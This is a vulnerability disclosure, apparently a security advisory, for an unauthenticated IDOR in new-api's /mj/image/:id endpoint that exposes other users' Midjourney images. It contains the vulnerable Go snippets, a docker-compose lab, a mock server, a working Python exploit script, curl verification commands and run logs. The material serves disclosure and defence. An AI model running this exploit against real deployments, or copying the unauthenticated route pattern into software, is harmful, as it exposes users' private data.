Title: Unauthenticated IDOR in /mj/image/:id Allows Cross-User Midjourney Image Disclosure
Description:
An authorization flaw in the Midjourney image relay endpoint allows an unauthenticated attacker to retrieve image content that belongs to other users.
The endpoint /mj/image/:id is reachable without TokenAuth, and the handler resolves tasks via mj_id only (GetByOnlyMJId) without user ownership validation. As a result, any attacker who can obtain or guess a valid mj_id can directly exfiltrate another user's generated image.
Root cause is a two-part logic flaw:
-
Missing authentication on endpoint
- In
router/relay-router.go,GET /mj/image/:idis registered before middleware application. TokenAuth/Distributeare applied only after this route registration.
- In
-
Missing object-level authorization
RelayMidjourneyImageinrelay/mjproxy_handler.gocalls:model.GetByOnlyMJId(taskId)
GetByOnlyMJIdinmodel/midjourney.goperformsWHERE mj_id = ?only.- There is no
user_idbinding in this code path.
Execution flow:
Attacker -> GET /mj/image/{victim_mj_id} (no token)
-> RelayMidjourneyImage
-> GetByOnlyMJId(victim_mj_id)
-> server-side GET midjourneyTask.ImageUrl
-> io.Copy(...) stream image to attacker
Relevant vulnerable snippets:
// router/relay-router.go
relayMjRouter.GET("/image/:id", relay.RelayMidjourneyImage)
relayMjRouter.Use(middleware.TokenAuth(), middleware.Distribute())// relay/mjproxy_handler.go
taskId := c.Param("id")
midjourneyTask := model.GetByOnlyMJId(taskId)
resp, err := httpClient.Get(midjourneyTask.ImageUrl)
_, err = io.Copy(c.Writer, resp.Body)// model/midjourney.go
func GetByOnlyMJId(mjId string) *Midjourney {
err = DB.Where("mj_id = ?", mjId).First(&mj).Error
}The following PoC is fully standalone and reproduces the issue from an external network perspective.
- Save the following as
docker-compose.yml:
version: "3.8"
services:
new-api:
image: calciumion/new-api:latest
restart: unless-stopped
command: --log-dir /app/logs
ports:
- "3301:3000"
environment:
SQL_DSN: postgresql://root:123456@postgres:5432/new-api
REDIS_CONN_STRING: redis://redis
TZ: UTC
ERROR_LOG_ENABLED: "true"
BATCH_UPDATE_ENABLED: "true"
volumes:
- ./data:/data
- ./logs:/app/logs
depends_on:
- redis
- postgres
- mock-mj
networks:
- idor-net
healthcheck:
test: ["CMD-SHELL", "wget -q -O - http://localhost:3000/api/status | grep -o '\"success\":\\s*true' || exit 1"]
interval: 20s
timeout: 10s
retries: 5
redis:
image: redis:latest
restart: unless-stopped
networks:
- idor-net
postgres:
image: postgres:15
restart: unless-stopped
environment:
POSTGRES_USER: root
POSTGRES_PASSWORD: 123456
POSTGRES_DB: new-api
volumes:
- pg_data:/var/lib/postgresql/data
networks:
- idor-net
mock-mj:
image: python:3.12-alpine
restart: unless-stopped
working_dir: /app
command: ["python", "/app/mock_mj_server.py"]
volumes:
- ./mock_mj_server.py:/app/mock_mj_server.py:ro
networks:
- idor-net
volumes:
pg_data:
networks:
idor-net:
driver: bridge- Save the following as
mock_mj_server.py:
from http.server import BaseHTTPRequestHandler, HTTPServer
import json
import time
class Handler(BaseHTTPRequestHandler):
def log_message(self, fmt, *args):
return
def _json(self, code, payload):
body = json.dumps(payload).encode("utf-8")
self.send_response(code)
self.send_header("Content-Type", "application/json")
self.send_header("Content-Length", str(len(body)))
self.end_headers()
self.wfile.write(body)
def do_POST(self):
if self.path == "/mj/submit/imagine":
task_id = f"victim-mj-{int(time.time() * 1000)}"
self._json(
200,
{
"code": 21,
"description": "task already exists",
"result": task_id,
"properties": {
"status": "SUCCESS",
"imageUrl": "https://httpbin.org/image/jpeg",
},
},
)
return
self._json(404, {"error": "not_found"})
def do_GET(self):
self._json(404, {"error": "not_found"})
if __name__ == "__main__":
HTTPServer(("0.0.0.0", 80), Handler).serve_forever()- Save the following as
poc_exploit.py:
import json
import os
import sys
import time
import hashlib
import requests
BASE_URL = os.getenv("TARGET_URL", "http://127.0.0.1:3301").rstrip("/")
LOGIN_USER = os.getenv("LOGIN_USER", "root")
DEFAULT_SETUP_PASS = "12345678"
LOGIN_PASS = os.getenv("LOGIN_PASS", DEFAULT_SETUP_PASS)
def fail(msg):
print(f"[FAIL] {msg}")
sys.exit(1)
def expect_json(resp, step):
try:
return resp.json()
except Exception:
fail(f"{step}: non-json response status={resp.status_code} body={resp.text[:300]}")
def api_success(resp, step):
body = expect_json(resp, step)
if resp.status_code != 200 or not body.get("success"):
fail(f"{step}: status={resp.status_code} body={json.dumps(body, ensure_ascii=True)}")
return body
def find_token_id(items, token_name):
candidates = [item for item in items if item.get("name") == token_name and item.get("id") is not None]
if not candidates:
return None
candidates.sort(key=lambda x: int(x.get("id", 0)), reverse=True)
return int(candidates[0]["id"])
def ensure_setup(session):
resp = session.get(f"{BASE_URL}/api/setup", timeout=15)
body = expect_json(resp, "get setup")
if resp.status_code != 200 or not body.get("success"):
fail(f"get setup failed: status={resp.status_code} body={json.dumps(body, ensure_ascii=True)}")
data = body.get("data") or {}
if data.get("status"):
return LOGIN_PASS
setup_pass = LOGIN_PASS if len(LOGIN_PASS) >= 8 else DEFAULT_SETUP_PASS
setup_resp = session.post(
f"{BASE_URL}/api/setup",
json={
"username": LOGIN_USER,
"password": setup_pass,
"confirmPassword": setup_pass,
"SelfUseModeEnabled": False,
"DemoSiteEnabled": False,
},
timeout=15,
)
setup_body = expect_json(setup_resp, "post setup")
if setup_resp.status_code != 200 or not setup_body.get("success"):
fail(f"post setup failed: status={setup_resp.status_code} body={json.dumps(setup_body, ensure_ascii=True)}")
print("[+] Initialized target via /api/setup")
return setup_pass
def login(session, password_candidates):
for candidate in password_candidates:
login_resp = session.post(
f"{BASE_URL}/api/user/login",
json={"username": LOGIN_USER, "password": candidate},
timeout=15,
)
login_body = expect_json(login_resp, "login")
if login_resp.status_code == 200 and login_body.get("success"):
user_id = ((login_body.get("data") or {}).get("id"))
if user_id is None:
fail("login success but missing user id")
print("[+] Logged in as root via external API")
return candidate, int(user_id)
fail("login failed with all password candidates")
def clear_existing_channels(session):
list_resp = session.get(f"{BASE_URL}/api/channel/?p=0&page_size=200", timeout=20)
list_body = api_success(list_resp, "list channels")
items = ((list_body.get("data") or {}).get("items") or [])
for item in items:
channel_id = item.get("id")
if channel_id is None:
continue
del_resp = session.delete(f"{BASE_URL}/api/channel/{int(channel_id)}", timeout=20)
del_body = expect_json(del_resp, f"delete channel {channel_id}")
if del_resp.status_code != 200 or not del_body.get("success"):
fail(f"delete channel {channel_id} failed: status={del_resp.status_code} body={json.dumps(del_body, ensure_ascii=True)}")
def main():
session = requests.Session()
setup_pass = ensure_setup(session)
candidates = []
for value in [setup_pass, LOGIN_PASS, DEFAULT_SETUP_PASS, "123456"]:
if value and value not in candidates:
candidates.append(value)
_, user_id = login(session, candidates)
session.headers.update({"New-Api-User": str(user_id)})
ts = int(time.time())
channel_name = f"idor-mj-channel-{ts}"
clear_existing_channels(session)
add_channel_resp = session.post(
f"{BASE_URL}/api/channel/",
json={
"mode": "single",
"channel": {
"name": channel_name,
"type": 2,
"key": "mock-midjourney-key",
"base_url": "http://mock-mj",
"group": "default",
"models": "mj_imagine",
"status": 1,
},
},
timeout=15,
)
api_success(add_channel_resp, "create channel")
print(f"[+] Created Midjourney channel: {channel_name}")
fix_resp = session.post(f"{BASE_URL}/api/channel/fix", json={}, timeout=15)
api_success(fix_resp, "fix channel abilities")
token_name = f"idor-mj-token-{ts}"
add_token_resp = session.post(
f"{BASE_URL}/api/token/",
json={
"name": token_name,
"remain_quota": 100000000,
"unlimited_quota": True,
"expired_time": -1,
"model_limits_enabled": False,
"group": "default",
},
timeout=15,
)
api_success(add_token_resp, "create token")
list_token_resp = session.get(f"{BASE_URL}/api/token/?p=0&page_size=100", timeout=15)
list_token_body = api_success(list_token_resp, "list tokens")
items = ((list_token_body.get("data") or {}).get("items") or [])
token_id = find_token_id(items, token_name)
if token_id is None:
fail("unable to locate created token id")
key_resp = session.post(f"{BASE_URL}/api/token/{token_id}/key", json={}, timeout=15)
key_body = api_success(key_resp, "get token key")
full_key = ((key_body.get("data") or {}).get("key") or "").strip()
if not full_key:
fail("empty token key")
print(f"[+] Retrieved API token id={token_id}")
submit_resp = session.post(
f"{BASE_URL}/mj/submit/imagine",
headers={"Authorization": f"Bearer {full_key}"},
json={"prompt": "victim confidential render"},
timeout=20,
)
submit_body = expect_json(submit_resp, "submit imagine")
submit_code = int(submit_body.get("code", -1))
if submit_resp.status_code != 200 or submit_code not in (1, 21):
fail(f"submit failed: status={submit_resp.status_code} body={json.dumps(submit_body, ensure_ascii=True)}")
mj_id = str(submit_body.get("result", "")).strip()
if not mj_id:
fail("submit response missing mj_id")
print(f"[+] Victim task created with mj_id={mj_id}")
exploit_resp = requests.get(f"{BASE_URL}/mj/image/{mj_id}", timeout=20)
if exploit_resp.status_code != 200:
fail(f"unauthenticated image fetch failed: status={exploit_resp.status_code} body={exploit_resp.text[:300]}")
content_type = exploit_resp.headers.get("Content-Type", "")
if "image" not in content_type.lower():
fail(f"unexpected content type from leak endpoint: {content_type}")
reference_resp = requests.get("https://httpbin.org/image/jpeg", timeout=20)
if reference_resp.status_code != 200:
fail(f"failed to fetch reference image: status={reference_resp.status_code}")
leaked_hash = hashlib.sha256(exploit_resp.content).hexdigest()
reference_hash = hashlib.sha256(reference_resp.content).hexdigest()
if leaked_hash != reference_hash:
fail("leaked response does not match expected victim image bytes")
with open("stolen_image.jpg", "wb") as f:
f.write(exploit_resp.content)
with open("exploit_result.log", "w", encoding="utf-8") as f:
f.write(f"target={BASE_URL}\\n")
f.write(f"mj_id={mj_id}\\n")
f.write(f"status={exploit_resp.status_code}\\n")
f.write(f"content_type={content_type}\\n")
f.write(f"bytes={len(exploit_resp.content)}\\n")
f.write(f"leaked_sha256={leaked_hash}\\n")
f.write(f"reference_sha256={reference_hash}\\n")
print("[EXPLOITED-EXTERNAL] Unauthenticated attacker retrieved victim image bytes")
print(f"[+] Evidence saved: stolen_image.jpg, exploit_result.log (mj_id={mj_id})")
if __name__ == "__main__":
main()- (Optional but recommended control) Save as
control-auth_enforced.py:
import os
import re
import sys
import requests
BASE_URL = os.getenv("TARGET_URL", "http://127.0.0.1:3301").rstrip("/")
def fail(msg):
print(f"[FAIL] {msg}")
sys.exit(1)
def load_mj_id():
value = os.getenv("MJ_ID", "").strip()
if value:
return value
if not os.path.exists("exploit_result.log"):
return ""
data = open("exploit_result.log", "r", encoding="utf-8").read()
m = re.search(r"^mj_id=(.+)$", data, flags=re.MULTILINE)
return m.group(1).strip() if m else ""
def main():
mj_id = load_mj_id()
if not mj_id:
fail("missing mj_id; run poc_exploit.py first or set MJ_ID")
resp = requests.get(f"{BASE_URL}/mj/task/{mj_id}/fetch", timeout=15)
if resp.status_code not in (401, 403):
fail(f"expected auth enforcement (401/403), got status={resp.status_code} body={resp.text[:300]}")
with open("control_result.log", "w", encoding="utf-8") as f:
f.write(f"target={BASE_URL}\\n")
f.write(f"mj_id={mj_id}\\n")
f.write(f"status={resp.status_code}\\n")
print("[CONTROL-BLOCKED] Protected Midjourney endpoint denied unauthenticated access")
print(f"[+] Evidence saved: control_result.log (status={resp.status_code})")
if __name__ == "__main__":
main()- Run:
docker compose up -d
python3 poc_exploit.py
python3 control-auth_enforced.py- Minimal direct HTTP verification:
MJ_ID=$(awk -F= '/^mj_id=/{print $2}' exploit_result.log)
curl -sS -o /tmp/mj_leak.jpg -w 'unauth_image_http=%{http_code} ct=%{content_type} bytes=%{size_download}\n' "http://127.0.0.1:3301/mj/image/$MJ_ID"
curl -sS -o /tmp/mj_control.txt -w 'unauth_task_http=%{http_code}\n' "http://127.0.0.1:3301/mj/task/$MJ_ID/fetch"Runtime evidence from the PoC execution:
[+] Logged in as root via external API
[+] Created Midjourney channel: idor-mj-channel-1775211177
[+] Retrieved API token id=9
[+] Victim task created with mj_id=victim-mj-1775211177224
[EXPLOITED-EXTERNAL] Unauthenticated attacker retrieved victim image bytes
[CONTROL-BLOCKED] Protected Midjourney endpoint denied unauthenticated access
Generated logs:
# exploit_result.log
target=http://127.0.0.1:3301
mj_id=victim-mj-1775211177224
status=200
content_type=image/jpeg
bytes=35588
leaked_sha256=c028d7aa15e851b0eefb31638a1856498a237faf1829050832d3b9b19f9ab75f
reference_sha256=c028d7aa15e851b0eefb31638a1856498a237faf1829050832d3b9b19f9ab75f
# control_result.log
target=http://127.0.0.1:3301
mj_id=victim-mj-1775211177224
status=401
Manual curl verification:
unauth_image_http=200 ct=image/jpeg bytes=35588
unauth_task_http=401
This is an unauthenticated object-level authorization bypass (IDOR) leading to sensitive data disclosure.
- Any external attacker can fetch another user's Midjourney image if a valid
mj_idis known. - Cross-tenant data isolation is broken.
- Private generated assets (designs, user-upload-derived images, potentially sensitive visual content) can be exfiltrated without credentials.
- Ecosystem: go
- Package name: QuantumNous/new-api
- Affected versions: Confirmed on v0.12.1 (and any build containing the same route order +
GetByOnlyMJIdauthorization logic) - Patched versions:
- Severity: High
- Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- CWE: CWE-639: Authorization Bypass Through User-Controlled Key
| Permalink | Description |
|---|---|
| https://github.com/QuantumNous/new-api/blob/main/router/relay-router.go#L203-L205 | /mj/image/:id is registered before TokenAuth middleware, leaving the endpoint unauthenticated. |
| https://github.com/QuantumNous/new-api/blob/main/relay/mjproxy_handler.go#L28-L53 | RelayMidjourneyImage reads path id, resolves task by ID only, and performs server-side fetch of the stored image URL. |
| https://github.com/QuantumNous/new-api/blob/main/relay/mjproxy_handler.go#L74-L76 | The response body is directly streamed to the requester, completing unauthorized data exfiltration. |
| https://github.com/QuantumNous/new-api/blob/main/model/midjourney.go#L104-L111 | GetByOnlyMJId uses WHERE mj_id = ? without user ownership checks. |
| https://github.com/QuantumNous/new-api/blob/main/model/midjourney.go#L114-L121 | A safer user-scoped query (GetByMJId(userId, mjId)) exists but is not used by /mj/image/:id. |